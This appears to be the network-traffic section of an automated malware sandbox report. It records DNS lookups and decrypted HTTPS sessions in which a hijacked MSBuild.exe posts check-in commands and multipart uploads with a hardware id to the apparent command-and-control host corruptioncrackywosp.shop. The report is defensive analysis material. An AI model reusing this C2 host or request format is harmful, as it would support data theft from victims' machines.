May 28, 2024 09:31:49.046972990 CEST	49705	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:49.124245882 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.124294996 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.124363899 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.124768972 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.124783993 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.599946976 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.600044966 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.601393938 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.601407051 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.601731062 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.603331089 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604201078 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604237080 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.604346991 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604382992 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.604497910 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604552984 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.604692936 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604718924 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.604886055 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.604912043 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.605071068 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.605102062 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.605110884 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.605243921 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.605272055 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618204117 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.618398905 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618458986 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618474007 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.618474960 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618546963 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.618618965 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618648052 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.618679047 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618726015 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618752956 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.618758917 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:49.618788958 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:53.361710072 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:53.362005949 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:31:53.362219095 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:53.362426043 CEST	49713	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:53.362447023 CEST	443	49713	104.21.92.10	192.168.2.5
May 28, 2024 09:32:00.166994095 CEST	49705	443	192.168.2.5	23.1.237.91
May 28, 2024 09:32:00.167309999 CEST	49705	443	192.168.2.5	23.1.237.91
May 28, 2024 09:32:00.167637110 CEST	49718	443	192.168.2.5	23.1.237.91
May 28, 2024 09:32:00.167691946 CEST	443	49718	23.1.237.91	192.168.2.5
May 28, 2024 09:32:00.169259071 CEST	49718	443	192.168.2.5	23.1.237.91
May 28, 2024 09:32:00.169697046 CEST	49718	443	192.168.2.5	23.1.237.91
May 28, 2024 09:32:00.169712067 CEST	443	49718	23.1.237.91	192.168.2.5
May 28, 2024 09:32:00.172044992 CEST	443	49705	23.1.237.91	192.168.2.5
May 28, 2024 09:32:00.172100067 CEST	443	49705	23.1.237.91	192.168.2.5
May 28, 2024 09:32:00.767359972 CEST	443	49718	23.1.237.91	192.168.2.5
May 28, 2024 09:32:00.767453909 CEST	49718	443	192.168.2.5	23.1.237.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2024 09:31:40.348694086 CEST	64386	53	192.168.2.5	1.1.1.1
May 28, 2024 09:31:40.363009930 CEST	53	64386	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 28, 2024 09:31:40.348694086 CEST	192.168.2.5	1.1.1.1	0x458c	Standard query (0)	corruptioncrackywosp.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 28, 2024 09:31:40.363009930 CEST	1.1.1.1	192.168.2.5	0x458c	No error (0)	corruptioncrackywosp.shop		104.21.92.10	A (IP address)	IN (0x0001)	false
May 28, 2024 09:31:40.363009930 CEST	1.1.1.1	192.168.2.5	0x458c	No error (0)	corruptioncrackywosp.shop		172.67.184.124	A (IP address)	IN (0x0001)	false
May 28, 2024 09:31:59.142355919 CEST	1.1.1.1	192.168.2.5	0x2fdd	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 28, 2024 09:31:59.142355919 CEST	1.1.1.1	192.168.2.5	0x2fdd	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

corruptioncrackywosp.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:40 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: corruptioncrackywosp.shop
2024-05-28 07:31:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-28 07:31:41 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9k7cmea25a5tsuhg6vtdgmeb6g; expires=Sat, 21-Sep-2024 01:18:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFauOz%2FUHNA5PszxeIN1RMez5UXeELczIa2YwZwKMn9OgQUHG2uUL7UKlqZNTtPRBDJamQ8gCpmN35ogMpTNWFY4OL0j%2FC3vDUJgv8qh5z5WFSziKClfQQjzR%2FuXAiqPgZ6PdvKPlXxIcDJU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8be56e53236a-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:41 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-28 07:31:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:41 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 60 Host: corruptioncrackywosp.shop
2024-05-28 07:31:41 UTC	60	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 74 69 79 6c 6f 67 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=sJAs2x--pizdatiylog&j=default
2024-05-28 07:31:42 UTC	814	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sikr541j0liu8gljfivmobonbb; expires=Sat, 21-Sep-2024 01:18:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYJH49Sa4%2F3zGTDsavOcP5AkzsGEjXgqORo7vAe6lVcL3Wi5KQs5hsi9gjLGy3xeXWIFcEDvRDlGC4ofezHH%2Fafg3FxoKDhQoDAuDbo9p%2FmGr%2BG1dnAgkEXN%2FyvlCyWIzcUv%2FZOcMkqM0ZQm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8bec1e1d8cbd-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:42 UTC	555	IN	Data Raw: 31 35 32 38 0d 0a 62 75 4a 52 39 37 67 35 6f 61 63 4f 49 55 33 4a 45 4d 45 75 43 64 73 4f 78 47 76 53 75 52 79 67 32 4e 55 77 73 34 53 74 6c 6c 59 56 77 43 66 56 67 67 32 4e 68 58 31 45 62 2f 4e 6b 73 31 74 73 39 79 79 6c 44 2f 43 44 65 73 47 30 70 6c 57 66 70 73 6a 75 64 46 53 35 4b 74 58 64 56 34 4f 64 4c 45 51 6e 71 33 47 74 54 47 69 77 59 62 51 48 73 64 46 77 78 37 43 77 55 39 66 6c 77 66 73 7a 43 34 63 77 6e 64 5a 51 7a 4d 39 6a 41 32 48 72 64 62 73 4d 4d 2f 6c 44 6f 52 2b 7a 39 48 33 54 73 2f 64 4e 6e 2f 2b 50 38 7a 68 4d 32 48 4f 57 33 56 76 4e 77 57 70 4b 4a 61 46 34 70 55 31 74 73 58 36 74 44 62 72 52 66 73 53 78 75 6c 72 44 36 4d 76 38 4f 41 32 4e 4d 4e 57 55 47 38 54 64 4c 42 74 76 2b 45 43 67 58 58 71 73 59 62 59 50 38 4d 51 77 32 2f 71 77 58 Data Ascii: 1528buJR97g5oacOIU3JEMEuCdsOxGvSuRyg2NUws4StllYVwCfVgg2NhX1Eb/Nks1ts9yylD/CDesG0plWfpsjudFS5KtXdV4OdLEQnq3GtTGiwYbQHsdFwx7CwU9flwfszC4cwndZQzM9jA2HrdbsMM/lDoR+z9H3Ts/dNn/+P8zhM2HOW3VvNwWpKJaF4pU1tsX6tDbrRfsSxulrD6Mv8OA2NMNWUG8TdLBtv+ECgXXqsYbYP8MQw2/qwX
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 76 43 50 36 33 6f 56 77 44 53 5a 6d 67 4f 44 79 32 6c 4d 50 61 70 67 70 6b 4a 35 74 57 6d 67 42 4c 50 56 66 73 65 39 75 6c 7a 58 34 63 7a 38 4d 41 32 4f 50 35 2f 5a 58 38 43 46 49 67 4d 6f 73 7a 4c 37 44 46 71 36 61 4b 45 62 73 39 55 2b 33 66 53 75 45 74 62 71 6a 36 78 30 42 6f 59 2b 6e 4e 46 63 79 38 6c 2b 53 43 43 6f 65 36 52 4b 59 62 70 6b 72 41 2b 2b 32 6e 6e 48 76 61 56 63 32 75 76 4d 2f 6a 4a 4d 7a 6e 4f 53 77 68 75 62 68 55 4a 41 50 72 31 41 6f 46 31 36 2b 58 50 6f 45 50 44 63 63 6f 4c 69 39 31 76 5a 36 63 4c 35 50 67 4b 46 50 70 7a 62 57 73 37 44 5a 30 49 6e 6f 33 61 6b 54 47 2b 30 59 36 67 4a 76 74 4e 37 78 72 43 2b 45 70 2b 6d 79 4f 78 30 56 4d 41 44 6d 4e 5a 51 7a 34 64 5a 51 43 47 6c 64 62 55 4d 64 50 64 31 35 67 36 38 6d 79 61 43 71 4c 78 66 Data Ascii: vCP63oVwDSZmgODy2lMPapgpkJ5tWmgBLPVfse9ulzX4cz8MA2OP5/ZX8CFIgMoszL7DFq6aKEbs9U+3fSuEtbqj6x0BoY+nNFcy8l+SCCoe6RKYbpkrA++2nnHvaVc2uvM/jJMznOSwhubhUJAPr1AoF16+XPoEPDccoLi91vZ6cL5PgKFPpzbWs7DZ0Ino3akTG+0Y6gJvtN7xrC+Ep+myOx0VMADmNZQz4dZQCGldbUMdPd15g68myaCqLxf
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 56 30 51 73 41 30 6a 5a 6f 44 67 2f 4e 38 54 69 4f 46 65 61 39 46 4b 36 59 69 76 30 6d 33 31 7a 36 61 2b 72 4e 65 32 65 7a 41 2f 54 34 47 6a 7a 71 56 30 6c 4c 4b 78 6d 78 50 4b 61 70 2b 72 30 46 75 75 6d 6d 72 44 4c 44 58 65 63 57 37 39 78 79 52 34 64 65 30 62 45 79 77 50 70 6e 52 56 34 48 77 62 30 30 68 72 47 54 6a 55 79 57 67 4c 4b 45 46 38 49 4d 2b 7a 62 75 36 57 4e 72 6f 77 2f 55 30 43 49 4d 35 6c 64 56 65 78 63 31 6c 51 7a 32 73 66 61 4a 4e 59 4c 4a 68 71 41 79 78 33 6e 6d 43 39 50 64 56 79 61 61 58 74 42 6b 6c 75 6e 4f 4b 6c 45 4b 44 77 6d 41 44 64 2b 74 32 71 55 78 6d 73 32 65 70 43 72 66 56 66 73 2b 77 70 56 72 52 35 73 48 79 4e 51 43 46 4d 70 6e 5a 53 63 2f 44 59 55 55 6e 75 54 4c 74 44 47 79 68 4c 50 35 4a 6b 4e 42 79 77 62 61 32 56 5a 50 48 78 Data Ascii: V0QsA0jZoDg/N8TiOFea9FK6Yiv0m31z6a+rNe2ezA/T4GjzqV0lLKxmxPKap+r0FuummrDLDXecW79xyR4de0bEywPpnRV4Hwb00hrGTjUyWgLKEF8IM+zbu6WNrow/U0CIM5ldVexc1lQz2sfaJNYLJhqAyx3nmC9PdVyaaXtBklunOKlEKDwmADd+t2qUxms2epCrfVfs+wpVrR5sHyNQCFMpnZSc/DYUUnuTLtDGyhLP5JkNBywba2VZPHx
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 53 4d 4a 6e 55 58 4d 33 4a 59 6b 34 6c 71 48 2f 6a 41 69 75 2b 64 4f 5a 52 38 50 64 35 7a 35 53 38 58 74 61 6d 30 4c 6f 74 54 49 63 2f 31 59 49 62 7a 38 39 67 53 69 2b 69 64 36 74 48 59 72 78 74 72 51 79 7a 33 58 50 4e 73 36 56 59 30 75 6a 4d 2b 44 67 4b 67 54 43 48 30 6c 4b 44 69 79 78 45 4e 2b 73 71 34 32 31 6c 74 48 69 68 47 66 44 45 4d 4e 76 36 73 46 36 52 76 6f 2f 33 4e 51 4f 44 4d 70 6a 63 55 73 76 46 61 6b 59 67 70 6e 79 6b 53 32 75 30 59 71 6b 50 75 4e 5a 79 79 62 53 2b 56 4e 48 6e 78 62 52 36 54 49 63 72 31 59 49 62 38 38 5a 73 51 7a 54 72 62 65 31 56 4b 37 35 67 35 6c 48 77 79 58 54 4c 75 72 52 64 31 75 4c 45 2b 44 45 4a 6a 7a 43 63 33 31 4c 4e 31 32 56 4e 4a 36 4e 39 70 6b 64 72 74 47 61 71 43 62 4f 62 4d 49 4b 39 72 78 4b 4a 70 76 33 35 4f 42 Data Ascii: SMJnUXM3JYk4lqH/jAiu+dOZR8Pd5z5S8Xtam0LotTIc/1YIbz89gSi+id6tHYrxtrQyz3XPNs6VY0ujM+DgKgTCH0lKDiyxEN+sq421ltHihGfDEMNv6sF6Rvo/3NQODMpjcUsvFakYgpnykS2u0YqkPuNZyybS+VNHnxbR6TIcr1YIb88ZsQzTrbe1VK75g5lHwyXTLurRd1uLE+DEJjzCc31LN12VNJ6N9pkdrtGaqCbObMIK9rxKJpv35OB
2024-05-28 07:31:42 UTC	762	IN	Data Raw: 30 31 6a 41 7a 47 74 4c 49 36 46 78 70 41 77 6c 2b 57 75 2b 53 65 69 62 58 64 57 71 75 68 4c 4f 71 4e 61 30 4d 77 44 41 61 39 58 53 56 73 76 50 61 45 51 69 72 48 53 71 58 6d 4b 38 59 71 59 4e 75 39 52 34 78 72 6d 33 51 4e 66 69 78 2f 63 35 41 59 34 77 6b 5a 6f 56 67 38 4a 30 41 33 66 72 51 4b 35 43 63 4c 5a 72 74 77 50 77 78 44 44 62 2b 72 42 65 6b 62 36 50 38 44 6f 65 69 7a 4b 65 30 56 58 45 79 6d 6c 4a 4c 36 52 32 6f 45 4a 67 75 47 2b 75 42 4c 33 56 64 4d 75 7a 73 46 37 56 34 59 2b 36 64 41 75 59 63 38 32 61 63 4f 4c 6f 51 45 51 31 36 32 33 74 56 53 75 2b 59 4f 5a 52 38 4e 64 33 7a 72 43 38 56 64 76 6f 78 76 6f 2f 48 70 49 77 6b 64 6c 53 77 4d 4a 6c 54 53 2b 73 64 36 31 4c 61 72 4a 6f 72 41 71 32 6d 7a 43 43 76 61 38 53 69 61 62 6a 39 7a 51 42 6d 6e 4f Data Ascii: 01jAzGtLI6FxpAwl+Wu+SeibXdWquhLOqNa0MwDAa9XSVsvPaEQirHSqXmK8YqYNu9R4xrm3QNfix/c5AY4wkZoVg8J0A3frQK5CcLZrtwPwxDDb+rBekb6P8DoeizKe0VXEymlJL6R2oEJguG+uBL3VdMuzsF7V4Y+6dAuYc82acOLoQEQ1623tVSu+YOZR8Nd3zrC8Vdvoxvo/HpIwkdlSwMJlTS+sd61LarJorAq2mzCCva8Siabj9zQBmnO
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 31 30 33 66 0d 0a 2b 7a 67 45 69 6e 50 62 6d 6c 7a 62 68 54 51 44 41 36 68 6a 71 51 35 4d 6f 33 71 68 42 61 48 51 63 38 37 36 71 42 7a 49 70 73 6a 34 64 46 54 41 4d 35 54 58 53 63 62 45 5a 6b 6b 69 6f 33 32 6d 53 57 53 39 61 4b 30 48 6f 74 56 78 77 72 79 38 55 39 54 6c 78 50 34 36 42 5a 4a 7a 32 35 70 63 32 34 55 30 41 77 57 77 63 36 35 41 4b 5a 64 6e 73 41 37 79 2b 6e 44 4a 76 62 74 45 6b 66 6d 42 37 58 51 4c 6a 48 50 4e 6d 6c 4c 4e 79 57 39 45 4a 36 4e 33 6f 30 64 72 74 6d 61 6f 44 71 4c 52 63 73 69 6f 75 46 48 63 34 73 4c 2b 4d 51 57 53 4e 70 7a 63 47 34 32 46 61 31 74 76 38 7a 4b 62 52 32 57 4c 62 37 31 4a 72 35 56 6e 67 72 32 37 45 6f 6d 6d 7a 50 4d 33 44 59 6f 36 6d 64 56 63 78 39 64 6d 52 44 32 71 63 36 68 42 5a 37 6c 68 71 77 4f 78 30 6e 50 4f 74 Data Ascii: 103f+zgEinPbmlzbhTQDA6hjqQ5Mo3qhBaHQc876qBzIpsj4dFTAM5TXScbEZkkio32mSWS9aK0HotVxwry8U9TlxP46BZJz25pc24U0AwWwc65AKZdnsA7y+nDJvbtEkfmB7XQLjHPNmlLNyW9EJ6N3o0drtmaoDqLRcsiouFHc4sL+MQWSNpzcG42Fa1tv8zKbR2WLb71Jr5Vngr27EommzPM3DYo6mdVcx9dmRD2qc6hBZ7lhqwOx0nPOt
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 76 33 66 6c 30 51 73 41 30 6a 5a 6f 44 67 2f 4a 67 53 42 36 6f 5a 4f 4e 54 56 50 63 73 71 52 50 77 67 30 66 62 2b 72 42 65 6b 62 36 50 34 54 4d 4d 68 79 6d 44 33 56 66 53 7a 6d 46 50 44 61 52 31 74 55 39 6b 75 6e 32 76 52 62 76 57 50 6f 7a 36 73 45 71 52 76 6f 2f 62 4d 78 71 44 48 4a 62 4c 55 6f 4f 4c 4c 45 51 35 36 79 72 6a 63 69 75 72 62 37 59 4b 76 38 70 41 67 75 4b 75 62 4a 48 74 32 66 4d 6b 44 35 59 34 6d 4e 5a 4b 2f 59 55 30 46 33 33 35 49 50 45 65 64 50 6c 7a 6d 55 66 77 32 6a 36 61 67 36 34 53 78 36 61 58 70 6e 70 4d 6b 6e 50 4e 6d 68 7a 41 31 33 35 46 4c 4c 31 78 35 48 4a 56 6e 6e 71 73 44 71 44 63 61 63 33 36 2b 52 4c 65 70 70 66 4e 64 41 57 48 4b 49 54 4d 56 74 50 43 4c 48 78 68 36 32 72 6a 46 43 75 4d 62 36 67 48 74 38 31 76 6a 35 32 68 57 4e Data Ascii: v3fl0QsA0jZoDg/JgSB6oZONTVPcsqRPwg0fb+rBekb6P4TMMhymD3VfSzmFPDaR1tU9kun2vRbvWPoz6sEqRvo/bMxqDHJbLUoOLLEQ56yrjciurb7YKv8pAguKubJHt2fMkD5Y4mNZK/YU0F335IPEedPlzmUfw2j6ag64Sx6aXpnpMknPNmhzA135FLL1x5HJVnnqsDqDcac36+RLeppfNdAWHKITMVtPCLHxh62rjFCuMb6gHt81vj52hWN
2024-05-28 07:31:42 UTC	1369	IN	Data Raw: 4e 51 47 50 66 35 76 52 57 38 54 56 65 6c 68 6a 6f 33 47 35 56 6c 57 48 52 36 6f 50 74 38 46 35 78 4a 79 58 45 70 2b 6d 77 4c 52 73 4e 63 42 37 31 65 55 56 67 39 30 73 47 32 2b 65 63 61 31 43 62 4b 39 39 36 79 47 54 34 55 53 41 6c 72 42 48 6b 39 4c 49 35 43 55 48 6a 54 2f 56 6c 42 76 46 68 54 51 54 59 65 74 32 73 67 77 7a 36 54 37 39 58 4f 4f 4d 4c 70 43 6c 2b 55 75 52 38 49 2b 73 5a 6b 4c 41 49 64 57 43 47 34 54 47 66 6c 45 70 71 47 53 67 43 31 57 48 53 36 67 4f 73 63 31 75 31 62 57 4a 62 4d 54 6c 77 66 6f 7a 47 70 46 7a 32 35 70 55 67 35 31 56 41 32 66 72 54 65 30 4d 63 2f 6b 30 35 6a 79 7a 31 58 44 46 72 4b 59 66 39 75 6a 49 39 53 49 63 6c 7a 7a 56 6c 42 76 46 68 54 51 52 59 65 74 32 73 67 77 7a 36 54 37 39 58 4f 4f 4d 4c 70 43 6c 2b 55 75 52 38 49 2b Data Ascii: NQGPf5vRW8TVelhjo3G5VlWHR6oPt8F5xJyXEp+mwLRsNcB71eUVg90sG2+eca1CbK996yGT4USAlrBHk9LI5CUHjT/VlBvFhTQTYet2sgwz6T79XOOMLpCl+UuR8I+sZkLAIdWCG4TGflEpqGSgC1WHS6gOsc1u1bWJbMTlwfozGpFz25pUg51VA2frTe0Mc/k05jyz1XDFrKYf9ujI9SIclzzVlBvFhTQRYet2sgwz6T79XOOMLpCl+UuR8I+
2024-05-28 07:31:42 UTC	60	IN	Data Raw: 6e 50 4e 69 52 57 44 31 79 77 62 62 2b 78 38 72 6b 31 6f 74 32 2b 30 47 37 62 59 61 4d 48 39 69 57 7a 38 39 4d 6a 6b 4e 30 36 78 50 70 48 4d 54 73 44 56 61 33 30 52 68 6d 43 0d 0a Data Ascii: nPNiRWD1ywbb+x8rk1ot2+0G7bYaMH9iWz89MjkN06xPpHMTsDVa30RhmC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:43 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: corruptioncrackywosp.shop
2024-05-28 07:31:43 UTC	12841	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FFB4F09779AD4AC6E163C1719BBA8588--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"sJAs2x--pizda
2024-05-28 07:31:43 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 28 May 2024 07:31:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tl1pcqi9defh1j6h5vkt0s7sq6; expires=Sat, 21-Sep-2024 01:18:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OADfZKkv8VGOB42aYX4%2BJFEMXBldhDftRWX%2BDJcCob4zCHGIKLGYSVoPxfl4z48gOTutFiVAgv3oQvtkh6bDpkdAJ1292LkxRJoaKTUywcgsQjX5aRmkEO%2BDK4n0isYGHZWUcTMdUX4EOed%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ac8bf25fdb5e66-EWR alt-svc: h3=":443"; ma=86400
2024-05-28 07:31:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-28 07:31:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	104.21.92.10	443	3948	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-28 07:31:44 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15083 Host: corruptioncrackywosp.shop
2024-05-28 07:31:44 UTC	15083	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 42 34 46 30 39 37 37 39 41 44 34 41 43 36 45 31 36 33 43 31 37 31 39 42 42 41 38 35 38 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 4a 41 73 32 78 2d 2d 70 69 7a 64 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; 